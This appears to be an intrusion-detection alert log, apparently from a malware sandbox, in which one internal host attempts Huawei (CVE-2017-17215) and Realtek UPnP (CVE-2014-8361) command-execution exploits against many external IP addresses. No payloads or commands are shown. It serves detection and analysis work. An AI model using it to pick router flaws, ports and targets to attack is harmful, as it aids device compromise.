                                                07/20/24-23:05:38.953643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4182637215192.168.2.14197.247.74.72
                                                07/20/24-23:06:12.549242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5130452869192.168.2.1434.5.253.95
                                                07/20/24-23:05:35.985482TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5196452869192.168.2.14190.147.108.124
                                                07/20/24-23:05:39.910306TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615848252869192.168.2.1442.188.126.193
                                                07/20/24-23:05:48.211869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5397052869192.168.2.14160.215.105.255
                                                07/20/24-23:06:02.203133TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4623852869192.168.2.14205.33.171.106
                                                07/20/24-23:06:09.741345TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613923652869192.168.2.14203.163.41.229
                                                07/20/24-23:05:37.560327TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24011652869192.168.2.1420.40.190.208
                                                07/20/24-23:05:56.124566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5889437215192.168.2.14157.251.203.57
                                                07/20/24-23:05:58.104584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5190052869192.168.2.1413.101.20.178
                                                07/20/24-23:06:01.963469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4015852869192.168.2.14184.42.36.239
                                                07/20/24-23:05:36.328888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820837215192.168.2.14157.136.100.134
                                                07/20/24-23:05:36.342361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801437215192.168.2.14157.173.110.253
                                                07/20/24-23:05:38.117397TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614167052869192.168.2.1492.201.144.62
                                                07/20/24-23:05:48.090130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613766252869192.168.2.14203.201.159.16
                                                07/20/24-23:05:50.600216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728237215192.168.2.1431.124.60.137
                                                07/20/24-23:05:46.881517TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615089052869192.168.2.14213.79.125.242
                                                07/20/24-23:06:01.433779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6001052869192.168.2.1481.215.136.101
                                                07/20/24-23:05:37.447452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3905452869192.168.2.14137.29.148.187
                                                07/20/24-23:05:34.657262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854837215192.168.2.1441.145.104.135
                                                07/20/24-23:05:40.413672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25015052869192.168.2.14206.167.163.90
                                                07/20/24-23:05:57.939156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615526252869192.168.2.14160.172.64.185
                                                07/20/24-23:06:36.472084TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4209052869192.168.2.1491.134.220.118
                                                07/20/24-23:06:29.100644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4825052869192.168.2.1443.11.143.126
                                                07/20/24-23:06:38.250934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4009452869192.168.2.1477.173.109.244
                                                07/20/24-23:05:59.429308TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23699852869192.168.2.1467.148.203.96
                                                07/20/24-23:06:18.420370TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614596652869192.168.2.1435.63.184.244
                                                07/20/24-23:05:59.473173TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25958852869192.168.2.14148.241.191.50
                                                07/20/24-23:05:34.622534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419437215192.168.2.1441.254.196.153
                                                07/20/24-23:05:36.323663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854437215192.168.2.1441.142.9.121
                                                07/20/24-23:05:59.139794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4162852869192.168.2.14178.190.0.107
                                                07/20/24-23:05:45.409134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5982437215192.168.2.1441.148.73.163
                                                07/20/24-23:07:34.258673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5201852869192.168.2.14104.173.87.38
                                                07/20/24-23:05:38.166047TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613621852869192.168.2.14136.196.140.175
                                                07/20/24-23:05:56.159948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530637215192.168.2.14158.254.116.74
                                                07/20/24-23:06:16.287042TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24974052869192.168.2.1498.16.115.167
                                                07/20/24-23:05:47.018380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5953837215192.168.2.14197.11.220.240
                                                07/20/24-23:05:55.889998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5278637215192.168.2.1441.189.113.240
                                                07/20/24-23:05:35.918953TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614936852869192.168.2.14199.117.44.204
                                                07/20/24-23:05:38.204956TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614570452869192.168.2.1432.192.109.254
                                                07/20/24-23:05:38.461325TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614124852869192.168.2.14179.191.229.197
                                                07/20/24-23:06:01.105390TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615860652869192.168.2.14204.151.52.231
                                                07/20/24-23:05:57.797833TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6027252869192.168.2.14174.109.92.117
                                                07/20/24-23:05:37.497165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24993652869192.168.2.1414.90.249.72
                                                07/20/24-23:06:13.708217TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614006452869192.168.2.14196.236.253.218
                                                07/20/24-23:06:08.328921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5725652869192.168.2.1414.251.169.202
                                                07/20/24-23:06:23.161234TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615697252869192.168.2.14192.199.88.49
                                                07/20/24-23:05:39.120890TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5887652869192.168.2.14128.15.34.80
                                                07/20/24-23:05:48.841499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6053837215192.168.2.14197.153.228.83
                                                07/20/24-23:06:16.628763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5503052869192.168.2.14182.50.115.219
                                                07/20/24-23:05:38.422868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4758852869192.168.2.1471.233.122.57
                                                07/20/24-23:05:40.325933TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25800252869192.168.2.1447.26.143.30
                                                07/20/24-23:05:35.579965TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3730052869192.168.2.1468.85.217.10
                                                07/20/24-23:05:37.456840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4178252869192.168.2.1491.48.213.35
                                                07/20/24-23:05:59.262014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4525452869192.168.2.1484.85.135.93
                                                07/20/24-23:05:52.445659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3739252869192.168.2.14167.216.237.21
                                                07/20/24-23:06:27.335940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3585452869192.168.2.1496.174.128.242
                                                07/20/24-23:05:42.269493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709637215192.168.2.1450.120.242.79
                                                07/20/24-23:05:47.544022TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614664652869192.168.2.14191.236.154.50
                                                07/20/24-23:05:48.762153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598837215192.168.2.14157.60.240.103
                                                07/20/24-23:07:11.472742TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3522652869192.168.2.14119.180.143.176
                                                07/20/24-23:06:21.926399TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5585052869192.168.2.14113.70.115.254
                                                07/20/24-23:06:05.768387TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23438852869192.168.2.14137.240.101.183
                                                07/20/24-23:05:38.582155TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616031452869192.168.2.1486.88.84.85
                                                07/20/24-23:06:03.111365TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614012852869192.168.2.1477.213.246.94
                                                07/20/24-23:05:52.682403TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24668652869192.168.2.1412.241.78.51
                                                07/20/24-23:06:31.663530TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26044852869192.168.2.1418.247.202.59
                                                07/20/24-23:06:34.348451TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26041052869192.168.2.14107.203.244.180
                                                07/20/24-23:06:29.180793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4675052869192.168.2.14125.193.155.236
                                                07/20/24-23:06:14.645434TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614305452869192.168.2.14126.165.56.151
                                                07/20/24-23:06:26.155233TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3385452869192.168.2.1476.98.41.108
                                                07/20/24-23:05:57.009321TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3451852869192.168.2.14220.246.104.60
                                                07/20/24-23:06:10.473848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4662252869192.168.2.14115.229.116.222
                                                07/20/24-23:05:35.213635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4435452869192.168.2.1464.104.54.14
                                                07/20/24-23:05:45.180728TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615280652869192.168.2.14219.160.20.3
                                                07/20/24-23:05:46.788416TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613696252869192.168.2.14156.242.205.254
                                                07/20/24-23:05:40.377377TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24171852869192.168.2.14141.149.116.120
                                                07/20/24-23:06:19.865859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4936652869192.168.2.1467.58.151.95
                                                07/20/24-23:05:52.716020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4018452869192.168.2.1452.41.95.126
                                                07/20/24-23:05:55.877930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4622437215192.168.2.1441.38.16.120
                                                07/20/24-23:05:42.134564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5613837215192.168.2.1444.215.66.206
                                                07/20/24-23:06:06.231390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3352652869192.168.2.14158.195.194.180
                                                07/20/24-23:06:49.853581TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613830052869192.168.2.14151.13.129.218
                                                07/20/24-23:06:14.162873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5908052869192.168.2.1427.172.117.243
                                                07/20/24-23:06:16.051223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725037215192.168.2.14197.181.54.80
                                                07/20/24-23:06:03.476247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401437215192.168.2.14197.20.11.116
                                                07/20/24-23:05:35.333329TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614092652869192.168.2.1445.129.181.164
                                                07/20/24-23:05:38.017676TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614812652869192.168.2.1496.95.169.154
                                                07/20/24-23:05:57.797833TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614329252869192.168.2.14179.59.38.175
                                                07/20/24-23:05:39.546980TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4613652869192.168.2.14103.130.0.226
                                                07/20/24-23:05:59.119988TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613549052869192.168.2.14173.137.64.120
                                                07/20/24-23:05:57.775925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5328652869192.168.2.14148.178.56.30
                                                07/20/24-23:05:36.580139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219237215192.168.2.14197.207.154.219
                                                07/20/24-23:05:50.522256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044637215192.168.2.1441.141.36.160
                                                07/20/24-23:05:52.531088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6066452869192.168.2.1452.191.253.144
                                                07/20/24-23:05:40.071724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5718852869192.168.2.1461.189.27.68
                                                07/20/24-23:05:57.887085TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25691652869192.168.2.14222.212.155.214
                                                07/20/24-23:05:58.112994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4369452869192.168.2.14106.37.253.180
                                                07/20/24-23:05:38.457187TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613455252869192.168.2.1498.249.26.162
                                                07/20/24-23:06:03.724116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5192252869192.168.2.14137.66.165.24
                                                07/20/24-23:05:59.118555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5267252869192.168.2.14160.237.156.120
                                                07/20/24-23:06:23.323671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3555452869192.168.2.14153.95.32.34
                                                07/20/24-23:05:56.066947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738637215192.168.2.1441.165.47.68
                                                07/20/24-23:05:37.449068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4694052869192.168.2.1496.209.69.20
                                                07/20/24-23:07:04.503671TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614232252869192.168.2.1449.110.216.241
                                                07/20/24-23:05:36.324524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336837215192.168.2.1470.62.163.57
                                                07/20/24-23:05:34.659618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5594237215192.168.2.1441.141.203.96
                                                07/20/24-23:05:35.786723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3887052869192.168.2.14135.6.251.247
                                                07/20/24-23:06:17.863423TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23527252869192.168.2.14216.40.228.188
                                                07/20/24-23:06:48.642445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912652869192.168.2.1480.232.145.96
                                                07/20/24-23:06:01.399812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5093852869192.168.2.14221.147.86.128
                                                07/20/24-23:06:00.224203TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25069652869192.168.2.14199.28.141.22
                                                07/20/24-23:05:58.366780TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24567652869192.168.2.14131.2.104.94
                                                07/20/24-23:06:03.314338TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613708052869192.168.2.14145.234.43.35
                                                07/20/24-23:05:34.657123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848437215192.168.2.14151.249.104.249
                                                07/20/24-23:05:37.468948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25929852869192.168.2.1444.6.194.12
                                                07/20/24-23:05:42.245742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349237215192.168.2.1441.55.101.144
                                                07/20/24-23:06:24.662240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5433252869192.168.2.14156.136.74.107
                                                07/20/24-23:06:02.466939TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25158652869192.168.2.14160.22.179.152
                                                07/20/24-23:06:15.061851TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614334852869192.168.2.1470.151.190.95
                                                07/20/24-23:06:02.042794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5442452869192.168.2.1472.185.216.95
                                                07/20/24-23:05:39.561842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4451852869192.168.2.14180.90.7.162
                                                07/20/24-23:06:09.206449TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912852869192.168.2.14119.34.14.186
                                                07/20/24-23:05:56.106041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599237215192.168.2.1441.204.84.61
                                                07/20/24-23:05:52.572723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3671852869192.168.2.14125.155.98.40
                                                07/20/24-23:05:36.354742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3487237215192.168.2.1476.110.225.69
                                                07/20/24-23:05:57.238429TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3358252869192.168.2.14211.48.36.13
                                                07/20/24-23:05:36.338927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056837215192.168.2.14157.113.23.58
                                                07/20/24-23:05:57.166360TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5630652869192.168.2.14103.108.73.218
                                                07/20/24-23:05:39.902488TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615558452869192.168.2.14115.80.228.184
                                                07/20/24-23:05:52.570834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4269852869192.168.2.1486.169.138.209
                                                07/20/24-23:05:56.948371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616033652869192.168.2.14114.99.252.59
                                                07/20/24-23:06:25.857963TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5683852869192.168.2.144.205.240.59
                                                07/20/24-23:05:38.002176TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5069452869192.168.2.14204.164.229.194
                                                07/20/24-23:05:42.135703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941837215192.168.2.14112.119.36.80
                                                07/20/24-23:05:36.261315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4130652869192.168.2.14112.153.191.145
                                                07/20/24-23:05:56.325754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6042437215192.168.2.1441.78.75.255
                                                07/20/24-23:05:36.327823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809837215192.168.2.14157.231.34.207
                                                07/20/24-23:05:52.589589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4869452869192.168.2.14191.236.154.50
                                                07/20/24-23:05:45.403579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823237215192.168.2.1441.172.130.86
                                                07/20/24-23:05:48.767395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574037215192.168.2.14189.91.251.59
                                                07/20/24-23:05:52.444445TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25266052869192.168.2.1499.53.49.224
                                                07/20/24-23:05:52.516035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4724852869192.168.2.14114.223.237.120
                                                07/20/24-23:06:03.028397TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23939852869192.168.2.1483.6.1.240
                                                07/20/24-23:05:39.152981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614376052869192.168.2.14106.152.34.222
                                                07/20/24-23:05:47.804016TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615012452869192.168.2.14207.158.17.11
                                                07/20/24-23:05:59.061994TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25501652869192.168.2.14140.182.198.151
                                                07/20/24-23:05:45.460569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795437215192.168.2.1457.203.241.201
                                                07/20/24-23:05:59.270058TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4066852869192.168.2.1413.146.163.137
                                                07/20/24-23:05:40.426800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5220652869192.168.2.14100.202.15.240
                                                07/20/24-23:05:59.324002TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24008452869192.168.2.14106.241.46.107
                                                07/20/24-23:06:35.355667TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25787452869192.168.2.1471.126.238.212
                                                07/20/24-23:06:18.014309TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3974252869192.168.2.1460.241.94.226
                                                07/20/24-23:05:45.649487TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5127652869192.168.2.14133.77.138.223
                                                07/20/24-23:06:02.598486TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614976652869192.168.2.14159.56.50.124
                                                07/20/24-23:05:56.993867TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614958052869192.168.2.14153.2.64.76
                                                07/20/24-23:06:14.442724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5763452869192.168.2.14178.170.81.229
                                                07/20/24-23:05:46.706860TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3532452869192.168.2.14210.13.132.2
                                                07/20/24-23:06:01.625834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3706852869192.168.2.14110.73.58.137
                                                07/20/24-23:05:35.277107TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615609652869192.168.2.144.162.121.105
                                                07/20/24-23:05:47.335286TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5020852869192.168.2.1449.62.131.203
                                                07/20/24-23:06:27.576162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615351052869192.168.2.14138.202.243.55
                                                07/20/24-23:06:31.826739TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615854652869192.168.2.14211.149.21.5
                                                07/20/24-23:06:00.747874TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614958452869192.168.2.14130.195.197.193
                                                07/20/24-23:05:57.194540TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613609252869192.168.2.141.71.203.54
                                                07/20/24-23:05:56.219051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131237215192.168.2.14123.217.142.78
                                                07/20/24-23:06:03.480553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4582652869192.168.2.14150.217.211.82
                                                07/20/24-23:05:59.119232TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24544252869192.168.2.14134.45.103.79
                                                07/20/24-23:05:57.943746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387252869192.168.2.14170.62.212.33
                                                07/20/24-23:06:01.336092TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613769852869192.168.2.1486.158.137.16
                                                07/20/24-23:05:57.179441TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3304652869192.168.2.14114.99.252.59
                                                07/20/24-23:05:45.429987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441437215192.168.2.14157.32.49.177
                                                07/20/24-23:05:56.159948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988837215192.168.2.14104.139.119.135
                                                07/20/24-23:05:59.464785TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4029252869192.168.2.14169.222.175.35
                                                07/20/24-23:05:39.176981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614028852869192.168.2.14164.63.211.187
                                                07/20/24-23:05:57.606361TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614348652869192.168.2.1494.175.0.69
